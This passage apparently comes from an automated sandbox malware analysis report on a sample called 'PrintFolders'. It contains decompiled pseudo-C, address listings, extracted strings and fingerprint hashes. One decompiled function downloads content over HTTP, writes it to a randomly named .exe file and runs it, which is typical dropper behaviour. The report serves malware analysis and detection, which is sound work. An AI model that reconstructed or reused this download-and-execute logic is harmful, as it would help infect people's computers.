																				_push(_t331);
																				_t225 = E10003229(_t300, _t362, _t381, __eflags);
																				_t406 = _t406 + 4;
																				__eflags = _t225;
																				if(__eflags == 0) {
																					L99:
																					E1000633C(_t300, _t331, _t349, __eflags);
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					_push(_t398);
																					_push(_t381);
																					_t382 = _v224;
																					_push(_t362);
																					_t363 = _t349;
																					__eflags = _t382;
																					if(_t382 != 0) {
																						__eflags = _t331;
																						if(__eflags != 0) {
																							_push(_t300);
																							_t301 = _v8;
																							__eflags = _t301;
																							if(_t301 == 0) {
																								L107:
																								E10004730(_t363, _t331, 0, _t363);
																								__eflags = _t301;
																								if(__eflags != 0) {
																									__eflags = _t363 - _t382;
																									if(__eflags >= 0) {
																										goto L109;
																									} else {
																										 *((intOrPtr*)(E10006406(__eflags))) = 0x22;
																										E1000632C();
																										return 0x22;
																									}
																								} else {
																									 *((intOrPtr*)(E10006406(__eflags))) = 0x16;
																									E1000632C();
																									L109:
																									return 0x16;
																								}
																							} else {
																								__eflags = _t363 - _t382;
																								if(_t363 < _t382) {
																									goto L107;
																								} else {
																									E10005BC0(_t331, _t301, _t382);
																									__eflags = 0;
																									return 0;
																								}
																							}
																						} else {
																							 *((intOrPtr*)(E10006406(__eflags))) = 0x16;
																							E1000632C();
																							return 0x16;
																						}
																					} else {
																						__eflags = 0;
																						return 0;
																					}
																				} else {
																					_t150 = _t225 + 0x23; // 0x23
																					_t300 = _t150 & 0xffffffe0;
																					 *(_t300 - 4) = _t225;
																					L91:
																					_t215 = _v16;
																					 *(_t362 + 0x14) = _t381;
																					 *(_t362 + 0x10) = _t215;
																					_t381 = _t215 + _t215;
																					E10005BC0(_t300, _v20, _t381);
																					_t406 = _t406 + 0xc;
																					 *((short*)(_t381 + _t300)) = 0;
																					_t218 = _v24;
																					__eflags = _t218 - 8;
																					if(_t218 < 8) {
																						L96:
																						 *_t362 = _t300;
																						return _t362;
																					} else {
																						_t332 = 2 + _t218 * 2;
																						_t220 =  *_t362;
																						__eflags = _t332 - 0x1000;
																						if(_t332 < 0x1000) {
																							L95:
																							_push(_t332);
																							E10003216(_t220);
																							goto L96;
																						} else {
																							_t349 =  *(_t220 - 4);
																							_t331 = _t332 + 0x23;
																							__eflags = _t220 - _t349 + 0xfffffffc - 0x1f;
																							if(__eflags > 0) {
																								goto L99;
																							} else {
																								_t220 = _t349;
																								goto L95;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																} else {
																	_t307 = _t362;
																	__eflags = _t331 - 8;
																	if(_t331 >= 8) {
																		_t307 =  *_t362;
																	}
																	_t391 = _t193 + _t193;
																	 *(_t362 + 0x10) = _t193;
																	E10005BC0(_t307, _t349, _t391);
																	__eflags = 0;
																	 *((short*)(_t391 + _t307)) = 0;
																	return _t362;
																}
															} else {
																L60:
																_push(_t229);
																_t330 = E10003229(_t300, _t360, _t381, __eflags);
																_t405 = _t405 + 4;
																__eflags = _t330;
																if(__eflags == 0) {
																	L71:
																	E1000633C(_t300, _t330, _t348, __eflags);
																	goto L72;
																} else {
																	_t127 = _t330 + 0x23; // 0x23
																	_t233 = _t127 & 0xffffffe0;
																	 *(_t233 - 4) = _t330;
																	L65:
																	_v12 = _t233;
																	_t381[4] = _t300;
																	_t381[5] = _t360;
																	E10005BC0(_t233, _v16, _t300);
																	_t360 = _v12;
																	_t405 = _t405 + 0xc;
																	_t235 = _v20;
																	 *((char*)(_t360 + _t300)) = 0;
																	__eflags = _t235 - 0x10;
																	if(_t235 < 0x10) {
																		L70:
																		 *_t381 = _t360;
																		return _t381;
																	} else {
																		_t333 = _t235 + 1;
																		_t237 =  *_t381;
																		__eflags = _t333 - 0x1000;
																		if(_t333 < 0x1000) {
																			L69:
																			_push(_t333);
																			E10003216(_t237);
																			goto L70;
																		} else {
																			_t348 =  *(_t237 - 4);
																			_t330 = _t333 + 0x23;
																			__eflags = _t237 - _t348 + 0xfffffffc - 0x1f;
																			if(__eflags > 0) {
																				goto L71;
																			} else {
																				_t237 = _t348;
																				goto L69;
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										} else {
											_t374 = _t381;
											__eflags = _t330 - 0x10;
											if(_t330 >= 0x10) {
												_t374 =  *_t381;
											}
											_t381[4] = _t300;
											E10005BC0(_t374, _t190, _t300);
											 *((char*)(_t374 + _t300)) = 0;
											return _t381;
										}
									} else {
										_t287 = _t295 - _t376;
										__eflags = _t287 - 7;
										_t356 =  <  ? _t287 : 7;
										__eflags = _v28 - 0x10;
										_t344 =  >=  ? _v48 :  &_v48;
										_t311 = _t295 - 7;
										_t345 =  &(( >=  ? _v48 :  &_v48)[_t376]);
										_v32 = _t311;
										__eflags = _t311 - _t376 + 1;
										E10005BC0( &(( >=  ? _v48 :  &_v48)[_t376]),  &(( &(( >=  ? _v48 :  &_v48)[_t376]))[ <  ? _t287 : 7]), _t311 - _t376 + 1);
										_t295 = _v32;
										_t401 = _t401 + 0xc;
										goto L20;
									}
								}
							} else {
								goto L15;
							}
							goto L112;
							L15:
							_t376 = E1000F670(_t376 + 1, 0x68, _v104 - _t376 + 1);
							_t401 = _t401 + 0xc;
						} while (_t376 != 0);
					}
					goto L20;
				}
				L112:
			}

0x100014f3
0x100014f5
0x10001500
0x10001501
0x10001504
0x10001509
0x1000150b
0x1000150f
0x10001511
0x10001515
0x1000151b
0x1000151e
0x10001521
0x10001523
0x1000152a
0x1000152d
0x10001534
0x1000153b
0x1000153e
0x10001542
0x10001542
0x10001544
0x10001545
0x1000154b
0x1000154c
0x10001550
0x10001555
0x10001563
0x10001566
0x1000156a
0x10001570
0x10001649
0x10001650
0x10001656
0x1000166e
0x1000166e
0x1000166e
0x10001658
0x10001661
0x10001663
0x10001668
0x00000000
0x1000166a
0x1000166a
0x1000166a
0x10001668
0x10001673
0x1000167c
0x10001683
0x10001686
0x10001694
0x10001695
0x1000169c
0x1000169d
0x100016a1
0x100016a6
0x100016ad
0x100016b2
0x100016b9
0x100016bd
0x100016bf
0x100016c9
0x100016ce
0x100016d4
0x100016d6
0x100016e1
0x100016ea
0x100016f2
0x100016fa
0x10001709
0x1000170b
0x10001710
0x100018ac
0x100018ac
0x100018b3
0x100018b9
0x100018e3
0x100018e3
0x100018e6
0x100018ed
0x100018f4
0x100018fb
0x10001925
0x1000192a
0x10001932
0x10001933
0x10001934
0x10001942
0x100018fd
0x100018fd
0x10001900
0x10001901
0x10001909
0x1000191b
0x1000191b
0x1000191d
0x00000000
0x1000190b
0x1000190b
0x1000190e
0x10001919
0x00000000
0x00000000
0x00000000
0x00000000
0x10001919
0x10001909
0x100018bb
0x100018bb
0x100018be
0x100018bf
0x100018c7
0x100018d9
0x100018d9
0x100018db
0x100018e0
0x00000000
0x100018c9
0x100018c9
0x100018cc
0x100018d7
0x00000000
0x00000000
0x00000000
0x00000000
0x100018d7
0x100018c7
0x10001716
0x1000171b
0x10001726
0x10001735
0x10001746
0x1000174c
0x10001752
0x10001757
0x100018a9
0x100018aa
0x00000000
0x1000175d
0x10001766
0x1000177f
0x10001783
0x100018a1
0x100018a4
0x100018a6
0x00000000
0x10001789
0x10001789
0x1000178b
0x10001795
0x1000179a
0x100017a1
0x100017a8
0x100017ac
0x100017b1
0x100017bc
0x100017c2
0x100017d0
0x100017d2
0x100017d4
0x100017dc
0x100017f0
0x100017f6
0x100017f8
0x100017fa
0x10001802
0x10001816
0x1000181c
0x1000181e
0x10001820
0x10001828
0x1000183c
0x10001842
0x10001844
0x10001848
0x1000184e
0x1000187c
0x1000188d
0x10001892
0x10001893
0x10001898
0x10001898
0x1000189c
0x1000189e
0x00000000
0x10001850
0x10001850
0x10001853
0x10001854
0x1000185c
0x10001872
0x10001872
0x10001874
0x10001879
0x00000000
0x1000185e
0x1000185e
0x10001861
0x1000186c
0x00000000
0x00000000
0x00000000
0x00000000
0x1000186c
0x1000185c
0x1000184e
0x10001783
0x10001757
0x10001576
0x10001576
0x1000157b
0x10001589
0x1000158b
0x10001590
0x10001596
0x100015a0
0x100015a0
0x100015a2
0x100015a7
0x100015b0
0x100015b2
0x100015b5
0x100015b8
0x100015b8
0x100015bb
0x100015bf
0x100015e2
0x100015e2
0x100015e4
0x100015e4
0x100015c1
0x100015c1
0x100015c7
0x00000000
0x100015c9
0x100015c9
0x100015cf
0x00000000
0x100015d1
0x100015d4
0x100015de
0x100015de
0x100015d6
0x100015d6
0x100015dc
0x00000000
0x00000000
0x00000000
0x00000000
0x100015dc
0x100015d4
0x100015cf
0x100015c7
0x100015e9
0x10001605
0x10001608
0x1000160b
0x00000000
0x1000160d
0x1000160d
0x1000160f
0x10001945
0x1000194a
0x1000194a
0x1000194f
0x1000194f
0x10001954
0x10001955
0x10001956
0x10001957
0x10001958
0x10001959
0x1000195a
0x1000195b
0x1000195c
0x1000195d
0x1000195e
0x1000195f
0x10001960
0x10001965
0x1000196a
0x1000196b
0x1000196c
0x1000196d
0x1000196e
0x1000196f
0x10001970
0x10001971
0x10001973
0x10001976
0x10001979
0x1000197a
0x1000197d
0x1000197e
0x10001980
0x10001983
0x10001984
0x10001987
0x1000198a
0x1000198c
0x100019b4
0x100019ba
0x10001a91
0x10001a91
0x00000000
0x100019c0
0x100019c2
0x100019c5
0x100019cb
0x100019fc
0x100019fc
0x10001a01
0x00000000
0x100019cd
0x100019d4
0x100019d8
0x100019da
0x00000000
0x100019dc
0x100019dc
0x100019df
0x100019e1
0x100019e4
0x100019e7
0x100019ed
0x10001a20
0x10001a22
0x10001a2f
0x10001a2f
0x10001a24
0x10001a24
0x10001a25
0x10001a2a
0x10001a2a
0x00000000
0x100019ef
0x100019ef
0x100019f2
0x100019f4
0x10001a96
0x10001a96
0x10001a9b
0x10001a9c
0x10001a9d
0x10001a9e
0x10001a9f
0x10001aa0
0x10001aa1
0x10001aa3
0x10001aa6
0x10001aa9
0x10001aac
0x10001aad
0x10001aae
0x10001aaf
0x10001ab1
0x10001ab4
0x10001ab7
0x10001aba
0x10001abd
0x10001abf
0x10001aec
0x10001af1
0x10001bea
0x10001bea
0x00000000
0x10001af7
0x10001af9
0x10001afc
0x10001b02
0x10001b17
0x10001b1b
0x10001b1d
0x10001b2b
0x10001b2e
0x10001b30
0x10001b33
0x10001b36
0x10001b3b
0x00000000
0x10001b41
0x10001b41
0x10001b43
0x10001b48
0x10001b71
0x10001b73
0x10001b82
0x10001b82
0x10001b75
0x10001b75
0x10001b76
0x10001b7b
0x10001b7e
0x10001b7e
0x00000000
0x00000000
0x00000000
0x00000000
0x10001b48
0x10001b1f
0x10001b1f
0x10001b24
0x00000000
0x10001b24
0x10001b04
0x10001b04
0x10001b09
0x10001b4a
0x10001b4a
0x10001b4a
0x10001b4d
0x10001b4f
0x10001be5
0x10001be5
0x00000000
0x10001b55
0x10001b55
0x10001b56
0x10001b5b
0x10001b5e
0x10001b60
0x10001bef
0x10001bef
0x10001bf4
0x10001bf5
0x10001bf6
0x10001bf7
0x10001bf8
0x10001bf9
0x10001bfa
0x10001bfb
0x10001bfc
0x10001bfd
0x10001bfe
0x10001bff
0x10001c00
0x10001c03
0x10001c04
0x10001c07
0x10001c08
0x10001c0a
0x10001c0c
0x10001c14
0x10001c16
0x10001c31
0x10001c32
0x10001c35
0x10001c37
0x10001c4f
0x10001c53
0x10001c5b
0x10001c5d
0x10001c79
0x10001c7b
0x00000000
0x10001c7d
0x10001c82
0x10001c88
0x10001c96
0x10001c96
0x10001c5f
0x10001c64
0x10001c6a
0x10001c6f
0x10001c78
0x10001c78
0x10001c39
0x10001c39
0x10001c3b
0x00000000
0x10001c3d
0x10001c40
0x10001c48
0x10001c4e
0x10001c4e
0x10001c3b
0x10001c18
0x10001c1d
0x10001c23
0x10001c30
0x10001c30
0x10001c0e
0x10001c0f
0x10001c13
0x10001c13
0x10001b66
0x10001b66
0x10001b69
0x10001b6c
0x10001b84
0x10001b84
0x10001b87
0x10001b8a
0x10001b8d
0x10001b95
0x10001b9c
0x10001b9f
0x10001ba3
0x10001ba6
0x10001ba9
0x10001bd8
0x10001bd8
0x10001be2
0x10001bab
0x10001bab
0x10001bb2
0x10001bb4
0x10001bba
0x10001bce
0x10001bce
0x10001bd0
0x00000000
0x10001bbc
0x10001bbc
0x10001bbf
0x10001bc7
0x10001bca
0x00000000
0x10001bcc
0x10001bcc
0x00000000
0x10001bcc
0x10001bca
0x10001bba
0x10001ba9
0x10001b60
0x10001b4f
0x10001b02
0x10001ac1
0x10001ac1
0x10001ac3
0x10001ac6
0x10001ac8
0x10001ac8
0x10001aca
0x10001acd
0x10001ad3
0x10001adb
0x10001add
0x10001ae9
0x10001ae9
0x100019fa
0x10001a06
0x10001a06
0x10001a0c
0x10001a0e
0x10001a11
0x10001a13
0x10001a8c
0x10001a8c
0x00000000
0x10001a15
0x10001a15
0x10001a18
0x10001a1b
0x10001a31
0x10001a35
0x10001a39
0x10001a3c
0x10001a3f
0x10001a44
0x10001a47
0x10001a4a
0x10001a4d
0x10001a51
0x10001a54
0x10001a7f
0x10001a7f
0x10001a89
0x10001a56
0x10001a56
0x10001a59
0x10001a5b
0x10001a61
0x10001a75
0x10001a75
0x10001a77
0x00000000
0x10001a63
0x10001a63
0x10001a66
0x10001a6e
0x10001a71
0x00000000
0x10001a73
0x10001a73
0x00000000
0x10001a73
0x10001a71
0x10001a61
0x10001a54
0x10001a13
0x100019f4
0x100019ed
0x100019da
0x100019cb
0x1000198e
0x1000198e
0x10001990
0x10001993
0x10001995
0x10001995
0x1000199a
0x1000199d
0x100019a5
0x100019b1
0x100019b1
0x10001615
0x1000161a
0x10001621
0x10001623
0x10001626
0x1000162a
0x1000162e
0x10001630
0x10001632
0x10001637
0x1000163e
0x10001643
0x10001646
0x00000000
0x10001646
0x1000160f
0x00000000
0x00000000
0x00000000
0x00000000
0x100015eb
0x100015fa
0x100015fc
0x100015ff
0x10001603
0x00000000
0x10001590
0x00000000

Strings

Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 10001795
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 100017D4
http://, xrefs: 100015A2
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 100017FA
GET, xrefs: 10001773
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 10001820

Memory Dump Source

Source File: 00000002.00000002.326460873.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.326456208.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326476703.0000000010010000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326484657.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.326522758.0000000010019000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_PrintFolders.jbxd

Similarity

API ID:
String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://
API String ID: 0-906950893
Opcode ID: d3ed00dd38609a7697d672608ec4d1622f700f7468701cf831d89b042d405c33
Instruction ID: 3e25db80656cceb02cc8fd81e0400d570f0dd4959431d348fe5b88a2f33083bb
Opcode Fuzzy Hash: d3ed00dd38609a7697d672608ec4d1622f700f7468701cf831d89b042d405c33
Instruction Fuzzy Hash: 86D1C231E00208AFEB11CFA8CC95FEEBBB9EF45390F644118F515AB295C775AA45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 0040EE60 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 91%

			E0040EE60(_Unknown_base(*)()* __edi, void* __esi) {
				struct HINSTANCE__* _t2;
				void* _t4;
				void* _t7;
				void* _t10;
				struct HINSTANCE__* _t14;

				_t11 = __edi;
				_push(__edi);
				InitializeCriticalSectionAndSpinCount(0x4504fc, 0xfa0);
				_t2 = GetModuleHandleW(L"api-ms-win-core-synch-l1-2-0.dll"); // executed
				_t14 = _t2;
				if(_t14 != 0) {
					L2:
					_t11 = GetProcAddress(_t14, "SleepConditionVariableCS");
					_t4 = GetProcAddress(_t14, "WakeAllConditionVariable");
					if(_t11 == 0 || _t4 == 0) {
						_t4 = CreateEventW(0, 1, 0, 0);
						 *0x4504f8 = _t4;
						if(_t4 != 0) {
							goto L5;
						} else {
							goto L7;
						}
					} else {
						 *0x450514 = _t11;
						 *0x450518 = _t4;
						L5:
						return _t4;
					}
				} else {
					_t14 = GetModuleHandleW(L"kernel32.dll");
					if(_t14 == 0) {
						L7:
						E0040F5F5(_t10, _t11, _t14, 7);
						asm("int3");
						DeleteCriticalSection(0x4504fc);
						_t7 =  *0x4504f8; // 0x0
						if(_t7 != 0) {
							return CloseHandle(_t7);
						}
						return _t7;
					} else {
						goto L2;
					}
				}
			}

0x0040ee60
0x0040ee61
0x0040ee6c
0x0040ee77
0x0040ee7d
0x0040ee81
0x0040ee94
0x0040eea6
0x0040eea8
0x0040eeb0
0x0040eecb
0x0040eed1
0x0040eed8
0x00000000
0x00000000
0x00000000
0x00000000
0x0040eeb6
0x0040eeb6
0x0040eebc
0x0040eec1
0x0040eec3
0x0040eec3
0x0040ee83
0x0040ee8e
0x0040ee92
0x0040eeda
0x0040eedc
0x0040eee1
0x0040eee7
0x0040eeed
0x0040eef4
0x00000000
0x0040eef7
0x0040eefd
0x00000000
0x00000000
0x00000000
0x0040ee92

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(004504FC,00000FA0,?,?,0040EE3E), ref: 0040EE6C
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,0040EE3E), ref: 0040EE77
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,0040EE3E), ref: 0040EE88
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0040EE9A
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0040EEA8
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0040EE3E), ref: 0040EECB
DeleteCriticalSection.KERNEL32(004504FC,00000007,?,?,0040EE3E), ref: 0040EEE7
CloseHandle.KERNEL32(00000000,?,?,0040EE3E), ref: 0040EEF7

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 0040EE72
kernel32.dll, xrefs: 0040EE83
SleepConditionVariableCS, xrefs: 0040EE94
WakeAllConditionVariable, xrefs: 0040EEA0

Memory Dump Source

Source File: 00000002.00000002.325006522.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.325165505.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PrintFolders.jbxd

Yara matches

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 6a30901e0316293d9dd8d087d713a46f6d2382c1dc1a8c068fa87155fa23cfe1
Instruction ID: 0577adb6b1f793cc774404ca345485d9f3401ded944aeed88ccdd136dffad262
Opcode Fuzzy Hash: 6a30901e0316293d9dd8d087d713a46f6d2382c1dc1a8c068fa87155fa23cfe1
Instruction Fuzzy Hash: 38019234740325ABD7305B73EC09B373AA8AB41B027940836FD04E22D1DA78CC1286AD

Uniqueness

Uniqueness Score: -1.00%

Function 10002450 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 400
fileprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E10002450(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v276;
				void* _v280;
				void* _v284;
				long _v288;
				intOrPtr _v292;
				void* _v296;
				void* _v300;
				intOrPtr _v304;
				signed int _v328;
				intOrPtr _v336;
				char _v340;
				void* _v416;
				intOrPtr _v432;
				void* _v436;
				struct _PROCESS_INFORMATION _v452;
				intOrPtr _v456;
				void* _v460;
				signed int* _v468;
				char _v472;
				void* _v476;
				void* _v484;
				void* _v488;
				long _v504;
				intOrPtr _v508;
				void* _v512;
				void* _v524;
				signed int _v532;
				void* _v536;
				void* _v540;
				char _v548;
				signed int _v552;
				signed int _v556;
				void* _v560;
				void* _v572;
				void* _v584;
				void* _v596;
				void* __esi;
				void* __ebp;
				signed int _t168;
				char _t174;
				void* _t177;
				void* _t183;
				signed int* _t185;
				signed int _t190;
				unsigned int _t217;
				void* _t218;
				signed int _t219;
				signed int _t225;
				signed int _t228;
				signed int _t230;
				void* _t231;
				signed int _t232;
				signed int _t233;
				char* _t235;
				void* _t241;
				signed int _t242;
				signed int _t243;
				long _t244;
				intOrPtr _t251;
				CHAR* _t253;
				void* _t260;
				intOrPtr _t269;
				signed int _t274;
				signed int _t278;
				signed int _t282;
				void* _t283;
				signed int _t285;
				char _t292;
				void* _t294;
				signed int _t295;
				void** _t297;
				signed int* _t307;
				signed int _t309;
				void* _t310;
				signed int _t315;
				signed int _t316;
				void* _t321;
				char* _t325;
				intOrPtr _t326;
				signed int _t332;
				signed int _t333;
				void* _t336;
				intOrPtr _t337;
				signed int _t338;
				void* _t339;
				signed int _t343;
				signed int _t348;
				intOrPtr _t349;
				void* _t350;
				void* _t351;
				void* _t352;
				void* _t353;
				char _t354;
				signed int _t356;
				void* _t357;
				signed int _t358;
				signed int _t360;
				char _t361;
				signed int _t364;
				signed int _t367;
				void* _t368;
				void* _t369;
				signed int* _t370;
				char* _t372;
				void* _t376;
				intOrPtr _t377;
				void* _t378;
				void* _t380;
				void* _t381;
				signed int _t382;
				signed int _t384;
				void* _t389;
				void* _t393;
				void* _t399;

				_t399 = __eflags;
				_t341 = __edx;
				_t294 = __ebx;
				_t384 = (_t382 & 0xfffffff0) - 0x228;
				_t168 =  *0x10017004; // 0x79eab102
				_v8 = _t168 ^ _t384;
				_t367 = _a8;
				_push(__edi);
				_t356 = _a4;
				E100064B5(__ecx, E10006436(__ecx, __edx, 0));
				E10004730(_t356,  &_v340, 0, 0x148);
				_v328 = _t367;
				_v336 = 0x7a120;
				_push(0x7a120); // executed
				_t174 = E1000320D(__ebx, _t356, _t367, _t399); // executed
				_v340 = _t174;
				E10004730(_t356, _t174, 0, _v336);
				_t176 = _v296;
				_t389 = _t384 + 0x24;
				_v304 = 0xfde9;
				_v284 = 0;
				_v280 = 0;
				_v276 = 0;
				_v288 = 0;
				if(_v296 != 0) {
					E10003224(_t176);
					_t389 = _t389 + 4;
					_v296 = 0;
				}
				_push(_t356);
				_t177 = E100014F0( &_v340); // executed
				if(_t177 == 0) {
					_t368 = 0xfffffffd;
					goto L60;
				} else {
					if(_v296 == 0) {
						L58:
						_t368 = 0;
						goto L60;
					} else {
						_t183 = _v284;
						if(_t183 == 0 || _t183 <= 2) {
							goto L58;
						} else {
							if(_t183 <= 0xc00) {
								_t368 = _t367 | 0xffffffff;
								goto L60;
							} else {
								E10001F90( &_v472, _t356);
								_t406 = _v456;
								if(_v456 == 0) {
									_t368 = 0xfffffffe;
									goto L53;
								} else {
									_t233 = E10006494( &_v472, _t406);
									asm("cdq");
									_t235 = E10001EB0(_t389 + 0x24, _t233 % 7 + 5);
									_push(_t235);
									L98();
									_t325 = _t235;
									_t389 = _t389 + 4;
									_t356 =  *(_t325 + 0x14);
									_t376 =  *(_t325 + 0x10);
									if(_t356 - _t376 < 4) {
										_push(4);
										_v548 = 0;
										_t325 = E10002E00(_t294, _t325, _t356, _t376, 4, _v548, ".exe");
									} else {
										_t354 = _t325;
										 *(_t325 + 0x10) = _t376 + 4;
										if(_t356 >= 0x10) {
											_t354 =  *_t325;
										}
										_t292 = ".exe"; // 0x6578652e
										 *(_t354 + _t376) = _t292;
										 *((char*)(_t354 + _t376 + 4)) = 0;
									}
									asm("movups xmm1, [ecx]");
									asm("movq xmm0, [ecx+0x10]");
									asm("movq [esp+0x80], xmm0");
									 *(_t325 + 0x10) = 0;
									 *(_t325 + 0x14) = 0xf;
									 *_t325 = 0;
									_t377 = _v456;
									_t326 = _v432;
									asm("movd edi, xmm1");
									_push(_t326);
									asm("movaps [esp+0x74], xmm1");
									_t347 =  >=  ? _t356 :  &(_v452.hThread);
									_push( >=  ? _t356 :  &(_v452.hThread));
									if(_t326 > _v452.hProcess - _t377) {
										_v552 = 0;
										_push(_v552);
										_push(_t326);
										_t241 = E10002E00(_t294,  &_v472, _t356, _t377);
										_t356 =  *(_t389 + 0x70);
										_t368 = _t241;
									} else {
										_v456 = _t326 + _t377;
										_t288 =  >=  ? _v472 :  &_v472;
										_t378 = _t377 + ( >=  ? _v472 :  &_v472);
										_push(_t378);
										E10005BC0();
										_t389 = _t389 + 0xc;
										 *((char*)(_t378 + _v432)) = 0;
										_t368 =  &_v472;
									}
									 *(_t389 + 0x40) = 0;
									_v484 = 0;
									 *(_t389 + 0x54) = 0;
									_t242 =  *(_t368 + 0x10);
									_v556 = _t242;
									if( *((intOrPtr*)(_t368 + 0x14)) >= 0x10) {
										_t368 =  *_t368;
									}
									if(_t242 >= 0x10) {
										_t243 = _t242 | 0x0000000f;
										__eflags = _t243 - 0x7fffffff;
										_t244 =  >  ? 0x7fffffff : _t243;
										_v504 = _t244;
										_t332 =  ~(0 | _t243 - 0x7fffffff > 0x00000000) | _t244 + 0x00000001;
										__eflags = _t332 - 0x1000;
										if(_t332 < 0x1000) {
											__eflags = _t332;
											if(__eflags == 0) {
												_t333 = 0;
												__eflags = 0;
											} else {
												_push(_t332);
												_t282 = E10003229(_t294, _t356, _t368, __eflags);
												_t389 = _t389 + 4;
												_t333 = _t282;
											}
											goto L27;
										} else {
											_t66 = _t332 + 0x23; // 0x23
											_t283 = _t66;
											__eflags = _t283 - _t332;
											if(__eflags <= 0) {
												E10001DE0(_t294);
												goto L62;
											} else {
												_push(_t283);
												_t285 = E10003229(_t294, _t356, _t368, __eflags);
												_t389 = _t389 + 4;
												__eflags = _t285;
												if(__eflags == 0) {
													goto L62;
												} else {
													_t67 = _t285 + 0x23; // 0x23
													_t333 = _t67 & 0xffffffe0;
													 *(_t333 - 4) = _t285;
													L27:
													__eflags = _v556 + 1;
													 *(_t389 + 0x40) = _t333;
													E10005BC0(_t333, _t368, _v556 + 1);
													_t389 = _t389 + 0xc;
													_v484 = _v556;
													 *(_t389 + 0x54) = _v504;
													goto L28;
												}
											}
										}
									} else {
										asm("movups xmm0, [esi]");
										_v484 = _t242;
										 *(_t389 + 0x54) = 0xf;
										asm("movups [esp+0x40], xmm0");
										L28:
										_t251 = _v432;
										if(_t251 < 0x10) {
											L32:
											_t348 = _v532;
											if(_t348 < 0x10) {
												L36:
												_t349 = _v508;
												_v536 = 0;
												_v532 = 0xf;
												_v552 = 0;
												if(_t349 < 0x10) {
													L40:
													_t253 =  >=  ?  *(_t389 + 0x40) : _t389 + 0x40;
													if(_v300 != 0 && _v288 != 0) {
														_t368 = CreateFileA(_t253, 0x40000000, 1, 0, 2, 0x80, 0);
														if(_t368 != 0xffffffff) {
															_v504 = 0;
															WriteFile(_t368, _v300, _v288,  &_v504, 0);
															CloseHandle(_t368);
														}
													}
													 *(_t389 + 0x9c) = 0x44;
													asm("xorps xmm0, xmm0");
													_t255 =  >=  ?  *((void*)(_t389 + 0x58)) : _t389 + 0x58;
													asm("movlpd [esp+0xc4], xmm0");
													asm("movlpd [esp+0xcc], xmm0");
													asm("movlpd [esp+0xd4], xmm0");
													asm("movlpd [esp+0xdc], xmm0");
													asm("movlpd [esp+0xe4], xmm0");
													asm("movlpd [esp+0xec], xmm0");
													asm("movlpd [esp+0xf4], xmm0");
													asm("movlpd [esp+0xfc], xmm0");
													asm("movaps [esp+0x98], xmm0");
													if(CreateProcessA( >=  ?  *((void*)(_t389 + 0x58)) : _t389 + 0x58, 0, 0, 0, 0, 0, 0, 0, _t389 + 0x9c,  &_v452) == 0 ||  *((intOrPtr*)(_t389 + 0x78)) == 0xffffffff) {
														_t258 =  >=  ?  *((void*)(_t389 + 0x44)) : _t389 + 0x40;
														ShellExecuteA(0, "open",  >=  ?  *((void*)(_t389 + 0x44)) : _t389 + 0x40, 0, 0, 0xa);
													}
													_t350 =  *(_t389 + 0x54);
													if(_t350 < 0x10) {
														L51:
														_t368 = 1;
														L53:
														_t341 = _v452.hThread;
														if(_t341 < 0x10) {
															L60:
															E10003224(_v336); // executed
															E10003224(_v296); // executed
															E10003224(_v292);
															__imp__CoUninitialize();
															_pop(_t357);
															_pop(_t369);
															return E100031FF(_t368, _t294, _v4 ^ _t389 + 0xc, _t341, _t357, _t369);
														} else {
															_t307 = _v468;
															_t341 = _t341 + 1;
															_t185 = _t307;
															if(_t341 < 0x1000) {
																L56:
																_push(_t341);
																E10003216(_t307);
																_t389 = _t389 + 8;
																goto L60;
															} else {
																_t307 =  *(_t307 - 4);
																_t341 = _t341 + 0x23;
																if(_t185 - _t307 + 0xfffffffc > 0x1f) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
